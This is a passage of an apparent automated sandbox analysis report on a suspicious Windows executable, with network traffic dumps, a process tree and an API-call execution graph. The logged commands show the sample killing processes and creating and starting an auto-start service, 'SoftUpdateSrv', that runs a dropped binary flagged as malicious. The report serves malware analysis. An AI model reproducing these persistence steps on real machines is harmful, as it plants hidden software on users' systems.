                                                                                      2023-08-04 16:49:40 UTC2972INData Raw: 5b 76 65 72 5f 63 6f 6e 66 5d 0d 0a 76 65 72 3d 33 30 30 32 32 36 34 0d 0a 0d 0a 5b 63 69 64 5f 63 6f 6e 66 5d 0d 0a 61 63 63 63 69 64 3d 39 35 31 30 30 31 35 2c 39 35 31 30 30 32 36 2c 39 35 31 30 30 31 37 2c 39 35 31 30 30 31 38 2c 39 35 31 30 30 32 35 2c 39 35 31 30 30 31 36 2c 36 30 30 30 32 37 31 2c 36 30 30 30 33 39 39 2c 33 31 31 32 35 35 30 2c 33 31 31 32 35 35 33 2c 33 31 31 32 35 35 34 2c 39 35 31 30 30 34 33 2c 39 35 31 30 30 35 30 2c 39 35 31 30 30 35 35 2c 39 35 31 30 30 36 30 2c 39 35 31 30 30 36 35 2c 39 35 31 30 30 36 38 2c 39 35 31 30 30 37 31 2c 39 35 31 30 30 37 35 2c 39 35 31 30 30 37 36 2c 39 35 31 30 30 38 33 2c 39 35 31 30 30 38 34 2c 33 31 31 32 37 30 30 2c 33 31 31 32 37 30 31 2c 33 31 31 32 37 30 32 2c 33 31 31 32 37 31 36 2c 33
                                                                                      Data Ascii: [ver_conf]ver=3002264[cid_conf]acccid=9510015,9510026,9510017,9510018,9510025,9510016,6000271,6000399,3112550,3112553,3112554,9510043,9510050,9510055,9510060,9510065,9510068,9510071,9510075,9510076,9510083,9510084,3112700,3112701,3112702,3112716,3


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.2.349752104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:49:51 UTC2981OUTHEAD /gf/KitTip/KitTip.cab HTTP/1.1
                                                                                      User-Agent: Beacon
                                                                                      Host: dl.360safe.com
                                                                                      Cache-Control: no-cache
                                                                                      2023-08-04 16:49:51 UTC2981INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:49:51 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 454788
                                                                                      Connection: close
                                                                                      Expires: Fri, 04 Aug 2023 16:50:23 GMT
                                                                                      Last-Modified: Wed, 02 Aug 2023 03:13:18 GMT
                                                                                      Cache-Control: max-age=1800
                                                                                      KCS-Via: HIT from w-f03.lato;MISS from back-f03.dl.lato;REVALIDATED from w-subsrc02.lato
                                                                                      K-Cache-status: MISS
                                                                                      Accept-Ranges: bytes


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:18:46:46
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:21'154'848 bytes
                                                                                      MD5 hash:EA6810E51B21867F42C2DC3C485EF68E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low

                                                                                      Target ID:5
                                                                                      Start time:18:48:32
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:sc stop SoftUpdateSrv
                                                                                      Imagebase:0x1140000
                                                                                      File size:60'928 bytes
                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:6
                                                                                      Start time:18:48:32
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:sc delete SoftUpdateSrv
                                                                                      Imagebase:0x1140000
                                                                                      File size:60'928 bytes
                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:7
                                                                                      Start time:18:48:32
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:8
                                                                                      Start time:18:48:33
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskkill /f /im winManager.exe
                                                                                      Imagebase:0x200000
                                                                                      File size:74'752 bytes
                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:9
                                                                                      Start time:18:48:33
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:10
                                                                                      Start time:18:48:33
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskkill /f /im FLMgrUpdate.exe
                                                                                      Imagebase:0x200000
                                                                                      File size:74'752 bytes
                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:11
                                                                                      Start time:18:48:33
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:12
                                                                                      Start time:18:48:33
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskkill /f /im FLMgrTray.exe
                                                                                      Imagebase:0x200000
                                                                                      File size:74'752 bytes
                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:13
                                                                                      Start time:18:48:33
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:14
                                                                                      Start time:18:48:33
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:16
                                                                                      Start time:18:48:44
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\explorer.exe" /select,"C:\Users\user\Desktop\wyyyyncmwjzh.rar
                                                                                      Imagebase:0x310000
                                                                                      File size:3'611'360 bytes
                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:17
                                                                                      Start time:18:48:44
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:sc CREATE SoftUpdateSrv type= own start= auto DisplayName= "Software Update Event Notification Service" binPath= "C:\Users\user\AppData\Local\winManager\FLServer.exe"
                                                                                      Imagebase:0x1140000
                                                                                      File size:60'928 bytes
                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:18
                                                                                      Start time:18:48:44
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                      Imagebase:0x7ff69fe90000
                                                                                      File size:3'933'184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:19
                                                                                      Start time:18:48:44
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:sc description SoftUpdateSrv "???????????"
                                                                                      Imagebase:0x1140000
                                                                                      File size:60'928 bytes
                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:20
                                                                                      Start time:18:48:44
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:21
                                                                                      Start time:18:48:45
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:23
                                                                                      Start time:18:48:59
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      Imagebase:0x160000
                                                                                      File size:318'496 bytes
                                                                                      MD5 hash:D17DDD41E804496F5077958A93D8843B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs

                                                                                      Target ID:24
                                                                                      Start time:18:48:59
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:sc start SoftUpdateSrv
                                                                                      Imagebase:0x1140000
                                                                                      File size:60'928 bytes
                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:25
                                                                                      Start time:18:48:59
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff745070000
                                                                                      File size:625'664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Target ID:26
                                                                                      Start time:18:48:59
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Users\user\AppData\Local\winManager\FLServer.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Local\winManager\FLServer.exe
                                                                                      Imagebase:0x2a0000
                                                                                      File size:205'344 bytes
                                                                                      MD5 hash:163745C2E7DF57C29533FE4CC8F574BF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 0%, ReversingLabs

                                                                                      Target ID:27
                                                                                      Start time:18:49:38
                                                                                      Start date:04/08/2023
                                                                                      Path:C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:
                                                                                      Imagebase:0x160000
                                                                                      File size:318'496 bytes
                                                                                      MD5 hash:D17DDD41E804496F5077958A93D8843B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:11%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:2.7%
                                                                                        Total number of Nodes:415
                                                                                        Total number of Limit Nodes:13
                                                                                        execution_graph 2427 59ae79 2430 59ba9c 2427->2430 2429 59ae7e 2429->2429 2431 59bab2 2430->2431 2433 59babb 2431->2433 2434 59ba4f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2431->2434 2433->2429 2434->2433 1956 6c0929 1973 6cd0cc 1956->1973 1960 6c0961 1976 6bd6ce 1960->1976 1961 6c0943 IsProcessorFeaturePresent 1964 6c094e 1961->1964 1963 6c0939 1963->1960 1963->1961 1996 6a7a9f 1964->1996 1965 6c096b _abort 1979 6ade08 EnterCriticalSection 1965->1979 1968 6c0986 1980 6c09e5 1968->1980 1972 6c09a4 _abort 2003 6ccf5b 1973->2003 2011 6bd499 1976->2011 1978 6bd6df 1978->1965 1979->1968 2074 6c8022 1980->2074 1987 6cd127 1989 6cd133 _abort 1987->1989 1988 6cd1ac __dosmaperr 1991 6a7c69 _abort 6 API calls 1988->1991 1989->1988 1990 6cd160 _abort 1989->1990 1995 6cd18f _abort 1989->1995 1994 6cd1d8 1990->1994 2302 6c01c1 EnterCriticalSection 1990->2302 1991->1995 1993 6bd6ce _abort 12 API calls 1993->1995 1994->1993 1994->1995 1995->1963 1997 6a7abb _abort 1996->1997 1998 6a7ae7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1997->1998 1999 6a7bb8 _abort 1998->1999 1999->1960 2000 6c09b1 2303 6ade1c LeaveCriticalSection 2000->2303 2002 6c09bb 2002->1972 2006 6ccf01 2003->2006 2005 6c092e 2005->1963 2005->1987 2007 6ccf0d _abort 2006->2007 2010 6c01c1 EnterCriticalSection 2007->2010 2009 6ccf1b _abort 2009->2005 2010->2009 2012 6bd4a5 _abort 2011->2012 2013 6bd4be 2012->2013 2014 6bd4ac 2012->2014 2034 6c01c1 EnterCriticalSection 2013->2034 2027 6bd5f3 GetModuleHandleW 2014->2027 2017 6bd4c5 2025 6bd53a _abort 2017->2025 2035 6be052 2017->2035 2020 6bd4bd 2020->2013 2021 6bd5ac _abort 2021->1978 2022 6bd580 2038 6bd5b2 2022->2038 2025->2021 2025->2022 2028 6bd4b1 2027->2028 2028->2013 2029 6bd637 GetModuleHandleExW 2028->2029 2030 6bd661 GetProcAddress 2029->2030 2033 6bd676 2029->2033 2030->2033 2031 6bd68a FreeLibrary 2032 6bd693 2031->2032 2032->2020 2033->2031 2033->2032 2034->2017 2046 6bdd8b 2035->2046 2065 6c7760 2038->2065 2040 6bd5bc 2041 6bd5e0 2040->2041 2042 6bd5c0 GetPEB 2040->2042 2044 6bd637 _abort 3 API calls 2041->2044 2042->2041 2043 6bd5d0 GetCurrentProcess TerminateProcess 2042->2043 2043->2041 2045 6bd5e8 ExitProcess 2044->2045 2049 6bdd3a 2046->2049 2048 6bddaf 2048->2025 2050 6bdd46 _abort 2049->2050 2055 6c01c1 EnterCriticalSection 2050->2055 2052 6bdd54 2056 6bdddb 2052->2056 2054 6bdd61 _abort 2054->2048 2055->2052 2057 6bddfb 2056->2057 2059 6bde03 2056->2059 2057->2054 2059->2057 2060 6c6c17 2059->2060 2061 6c6c22 RtlFreeHeap 2060->2061 2064 6c6c4b __dosmaperr 2060->2064 2062 6c6c37 __dosmaperr 2061->2062 2061->2064 2063 6c6c3d GetLastError 2062->2063 2063->2064 2064->2057 2066 6c7785 2065->2066 2068 6c777b 2065->2068 2070 6c6dba 2066->2070 2068->2040 2069 6c779c 2069->2068 2071 6c6de6 2070->2071 2073 6c6dea __crt_fast_encode_pointer 2070->2073 2072 6c6e16 GetProcAddress 2071->2072 2071->2073 2072->2073 2073->2069 2096 6bce7f 2074->2096 2076 6c8031 2101 6d15b0 2076->2101 2078 6c09fb 2083 6adfe5 2078->2083 2079 6c8037 _abort 2079->2078 2106 6c8110 2079->2106 2081 6c8096 2082 6c6c17 _free 2 API calls 2081->2082 2082->2078 2085 6adff7 2083->2085 2088 6ae015 2083->2088 2084 6ae005 __dosmaperr 2087 6a7c69 _abort 6 API calls 2084->2087 2085->2084 2086 6ae030 _abort 2085->2086 2085->2088 2086->2088 2090 6bce7f _abort 6 API calls 2086->2090 2133 6b8eaa 2086->2133 2139 6c6104 2086->2139 2087->2088 2092 6c80d7 2088->2092 2090->2086 2093 6c0993 2092->2093 2094 6c80e2 2092->2094 2093->2000 2094->2093 2095 6b8eaa _abort 46 API calls 2094->2095 2095->2093 2097 6bce8b __dosmaperr 2096->2097 2098 6bcea0 2096->2098 2111 6a7c69 2097->2111 2098->2076 2103 6d15bd __dosmaperr 2101->2103 2104 6d15ca __dosmaperr 2101->2104 2102 6d15d6 2102->2079 2103->2079 2104->2102 2105 6a7c69 _abort 6 API calls 2104->2105 2105->2103 2107 6c814c __dosmaperr 2106->2107 2108 6c811e _abort 2106->2108 2107->2081 2108->2107 2109 6c8139 RtlAllocateHeap 2108->2109 2125 6cce6b 2108->2125 2109->2107 2109->2108 2114 6a7bee 2111->2114 2113 6a7c75 2113->2076 2115 6a7c04 2114->2115 2118 6a7c12 2115->2118 2121 6a7c96 IsProcessorFeaturePresent 2115->2121 2117 6a7c68 2119 6a7bee _abort 6 API calls 2117->2119 2118->2113 2120 6a7c75 2119->2120 2120->2113 2122 6a7ca1 2121->2122 2123 6a7a9f _abort 3 API calls 2122->2123 2124 6a7cb6 GetCurrentProcess TerminateProcess 2123->2124 2124->2117 2128 6cceaf 2125->2128 2127 6cce81 2127->2108 2129 6ccebb _abort 2128->2129 2132 6c01c1 EnterCriticalSection 2129->2132 2131 6ccec6 _abort 2131->2127 2132->2131 2134 6b8ec2 2133->2134 2138 6b8ebe 2133->2138 2135 6bce7f _abort 6 API calls 2134->2135 2134->2138 2136 6b8ee2 2135->2136 2137 6c6104 _abort 46 API calls 2136->2137 2137->2138 2138->2086 2140 6c6110 _abort 2139->2140 2141 6c6165 2140->2141 2142 6c61ce __dosmaperr 2140->2142 2146 6c6118 __dosmaperr _abort 2140->2146 2150 6bcfec EnterCriticalSection 2141->2150 2145 6a7c69 _abort 6 API calls 2142->2145 2144 6c616b 2148 6c6187 __dosmaperr 2144->2148 2151 6c61ef 2144->2151 2145->2146 2146->2086 2182 6c61c6 2148->2182 2150->2144 2152 6c621d 2151->2152 2180 6c6216 __dosmaperr 2151->2180 2153 6c6240 2152->2153 2155 6c6221 __dosmaperr 2152->2155 2154 6c6291 2153->2154 2161 6c6274 __dosmaperr 2153->2161 2156 6c62a7 2154->2156 2185 6c50a6 2154->2185 2159 6a7c69 _abort 6 API calls 2155->2159 2188 6c5d94 2156->2188 2159->2180 2168 6a7c69 _abort 6 API calls 2161->2168 2162 6c62ee 2164 6c6348 WriteFile 2162->2164 2165 6c6302 2162->2165 2163 6c62b5 2166 6c62b9 2163->2166 2167 6c62db 2163->2167 2169 6c636b GetLastError 2164->2169 2164->2180 2171 6c6338 2165->2171 2172 6c630a 2165->2172 2166->2180 2193 6c5d27 2166->2193 2198 6c5b74 GetConsoleCP 2167->2198 2168->2180 2169->2180 2218 6c5e0a 2171->2218 2173 6c630f 2172->2173 2174 6c6328 2172->2174 2177 6c6318 2173->2177 2173->2180 2212 6c5fd7 2174->2212 2207 6c5ee9 2177->2207 2179 6c6326 2179->2180 2180->2148 2301 6bd0a3 LeaveCriticalSection 2182->2301 2184 6c61cc 2184->2146 2223 6c500d 2185->2223 2187 6c50bc 2187->2156 2189 6d15b0 _abort 6 API calls 2188->2189 2191 6c5da4 2189->2191 2190 6c5da9 2190->2162 2190->2163 2191->2190 2192 6c5dea GetConsoleMode 2191->2192 2192->2190 2194 6c5d81 2193->2194 2197 6c5d4c 2193->2197 2194->2180 2195 6d1606 WriteConsoleW CreateFileW _abort 2195->2197 2196 6c5d83 GetLastError 2196->2194 2197->2194 2197->2195 2197->2196 2199 6c5ce9 2198->2199 2201 6c5bd7 2198->2201 2199->2180 2201->2199 2202 6c5c5d WideCharToMultiByte 2201->2202 2204 6c8258 41 API calls __fassign 2201->2204 2206 6c5cb4 WriteFile 2201->2206 2234 6c0232 2201->2234 2202->2199 2203 6c5c83 WriteFile 2202->2203 2203->2201 2205 6c5d0c GetLastError 2203->2205 2204->2201 2205->2199 2206->2201 2206->2205 2209 6c5ef8 _abort 2207->2209 2208 6c5fba 2208->2179 2209->2208 2210 6c5f76 WriteFile 2209->2210 2210->2209 2211 6c5fbc GetLastError 2210->2211 2211->2208 2217 6c5fe6 _abort 2212->2217 2213 6c60f1 2213->2179 2214 6c6068 WideCharToMultiByte 2215 6c609d WriteFile 2214->2215 2216 6c60e9 GetLastError 2214->2216 2215->2216 2215->2217 2216->2213 2217->2213 2217->2214 2217->2215 2219 6c5e19 _abort 2218->2219 2220 6c5ecc 2219->2220 2221 6c5e8b WriteFile 2219->2221 2220->2179 2221->2219 2222 6c5ece GetLastError 2221->2222 2222->2220 2229 6bd269 2223->2229 2225 6c501f 2226 6c5038 SetFilePointerEx 2225->2226 2228 6c5027 __dosmaperr 2225->2228 2227 6c5050 GetLastError 2226->2227 2226->2228 2227->2228 2228->2187 2230 6bd28b __dosmaperr 2229->2230 2231 6bd276 __dosmaperr 2229->2231 2232 6bd2b0 2230->2232 2233 6a7c69 _abort 6 API calls 2230->2233 2231->2225 2232->2225 2233->2231 2235 6c023d 2234->2235 2238 6c6bb2 2235->2238 2239 6c024d 2238->2239 2240 6c6bc5 2238->2240 2239->2201 2240->2239 2242 6ce423 2240->2242 2243 6ce42f _abort 2242->2243 2244 6ce486 _abort 2243->2244 2250 6c01c1 EnterCriticalSection 2243->2250 2244->2239 2246 6ce456 2251 6ce49a 2246->2251 2248 6ce46a __fassign 2248->2244 2255 6c0929 2248->2255 2250->2246 2252 6ce4a8 __fassign 2251->2252 2254 6ce4b5 2251->2254 2252->2254 2272 6ce1d6 2252->2272 2254->2248 2256 6cd0cc _abort EnterCriticalSection 2255->2256 2257 6c092e 2256->2257 2258 6cd127 _abort 18 API calls 2257->2258 2262 6c0939 2257->2262 2258->2262 2259 6c0961 2261 6bd6ce _abort 12 API calls 2259->2261 2260 6c0943 IsProcessorFeaturePresent 2263 6c094e 2260->2263 2264 6c096b _abort 2261->2264 2262->2259 2262->2260 2265 6a7a9f _abort 3 API calls 2263->2265 2300 6ade08 EnterCriticalSection 2264->2300 2265->2259 2267 6c0986 2268 6c09e5 _abort 45 API calls 2267->2268 2269 6c0993 2268->2269 2270 6c09b1 _abort LeaveCriticalSection 2269->2270 2271 6c09a4 _abort 2270->2271 2271->2244 2274 6ce256 2272->2274 2278 6ce1ec 2272->2278 2273 6ce349 __fassign RtlFreeHeap GetLastError 2287 6ce2b2 2273->2287 2275 6c6c17 _free RtlFreeHeap GetLastError 2274->2275 2298 6ce2a4 2274->2298 2276 6ce278 2275->2276 2277 6c6c17 _free RtlFreeHeap GetLastError 2276->2277 2279 6ce28b 2277->2279 2278->2274 2281 6c6c17 _free RtlFreeHeap GetLastError 2278->2281 2296 6ce21f 2278->2296 2283 6c6c17 _free RtlFreeHeap GetLastError 2279->2283 2280 6c6c17 _free RtlFreeHeap GetLastError 2284 6ce24b 2280->2284 2286 6ce214 2281->2286 2282 6c6c17 _free RtlFreeHeap GetLastError 2288 6ce236 2282->2288 2289 6ce299 2283->2289 2290 6c6c17 _free RtlFreeHeap GetLastError 2284->2290 2285 6ce312 2291 6c6c17 _free RtlFreeHeap GetLastError 2285->2291 2292 6cd4e1 ___free_lconv_mon RtlFreeHeap GetLastError 2286->2292 2287->2285 2299 6c6c17 RtlFreeHeap GetLastError _free 2287->2299 2293 6cd99b __fassign RtlFreeHeap GetLastError 2288->2293 2294 6c6c17 _free RtlFreeHeap GetLastError 2289->2294 2290->2274 2295 6ce318 2291->2295 2292->2296 2297 6ce241 2293->2297 2294->2298 2295->2254 2296->2282 2296->2297 2297->2280 2298->2273 2299->2287 2300->2267 2301->2184 2302->1994 2303->2002 2435 6c67a4 2440 6c677c 2435->2440 2446 6c66bc 2440->2446 2442 6c67a0 2443 6c672c 2442->2443 2451 6c65c0 2443->2451 2445 6c6750 2447 6c66c8 _abort 2446->2447 2450 6c01c1 EnterCriticalSection 2447->2450 2449 6c66d2 _abort 2449->2442 2450->2449 2452 6c65cc _abort 2451->2452 2455 6c01c1 EnterCriticalSection 2452->2455 2454 6c65d6 _abort 2454->2445 2455->2454 2456 6a3b50 2459 6a3b80 ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 2456->2459 2457 6a3be7 _ValidateLocalCookies 2459->2457 2461 6a7584 RtlUnwind 2459->2461 2460 6a3c70 _ValidateLocalCookies 2462 6a7599 2461->2462 2462->2460 2304 6c8110 2305 6c814c __dosmaperr 2304->2305 2306 6c811e _abort 2304->2306 2306->2305 2307 6c8139 RtlAllocateHeap 2306->2307 2308 6cce6b _abort EnterCriticalSection 2306->2308 2307->2305 2307->2306 2308->2306 2463 6c7102 2464 6c6dba _abort GetProcAddress 2463->2464 2465 6c7129 2464->2465 2466 6c7144 TlsSetValue 2465->2466 2467 6c7138 2465->2467 2466->2467 2309 6b32f4 2310 6b3300 _abort 2309->2310 2311 6b3307 GetLastError ExitThread 2310->2311 2312 6b3314 2310->2312 2313 6c7760 _abort GetProcAddress 2312->2313 2314 6b3324 2313->2314 2315 6b332f 2314->2315 2330 6c75ea 2314->2330 2319 6b3561 2315->2319 2318 6b3351 2333 6b33a8 2319->2333 2321 6a7c69 _abort 6 API calls 2322 6b359e 2321->2322 2322->2318 2323 6b356e _abort 2323->2322 2324 6b358e __dosmaperr _abort 2323->2324 2328 6b3694 2323->2328 2349 6ad9d5 2323->2349 2324->2321 2326 6bce7f _abort 6 API calls 2326->2328 2328->2322 2328->2323 2328->2326 2329 6b3737 2328->2329 2356 6c57bf 2328->2356 2329->2322 2331 6c6dba _abort GetProcAddress 2330->2331 2332 6c7611 2331->2332 2332->2315 2335 6b33b3 2333->2335 2334 6b33b7 ExitThread 2335->2334 2336 6b33d5 2335->2336 2398 6c763c 2335->2398 2337 6b33e8 2336->2337 2339 6b33e1 CloseHandle 2336->2339 2337->2334 2340 6b33f4 FreeLibraryAndExitThread 2337->2340 2339->2337 2391 6c6c51 2340->2391 2342 6b340f 2343 6c6c17 _free 2 API calls 2342->2343 2344 6b3418 2343->2344 2345 6b341f GetModuleHandleExW 2344->2345 2346 6b3437 2344->2346 2345->2346 2401 6b3371 2346->2401 2350 6ad9e6 2349->2350 2353 6ad9e2 _abort 2349->2353 2351 6ad9ed __dosmaperr 2350->2351 2354 6ada00 __dosmaperr _abort 2350->2354 2352 6a7c69 _abort 6 API calls 2351->2352 2352->2353 2353->2323 2354->2353 2355 6a7c69 _abort 6 API calls 2354->2355 2355->2353 2357 6c57e9 2356->2357 2358 6c57d1 __dosmaperr 2356->2358 2357->2358 2359 6c5869 2357->2359 2361 6c5839 __dosmaperr 2357->2361 2358->2328 2362 6c5882 2359->2362 2363 6c58c4 2359->2363 2366 6c58a8 __dosmaperr 2359->2366 2360 6a7c69 _abort 6 API calls 2360->2358 2361->2360 2362->2366 2368 6c588f 2362->2368 2364 6c8110 _abort 2 API calls 2363->2364 2365 6c58db 2364->2365 2369 6c6c17 _free 2 API calls 2365->2369 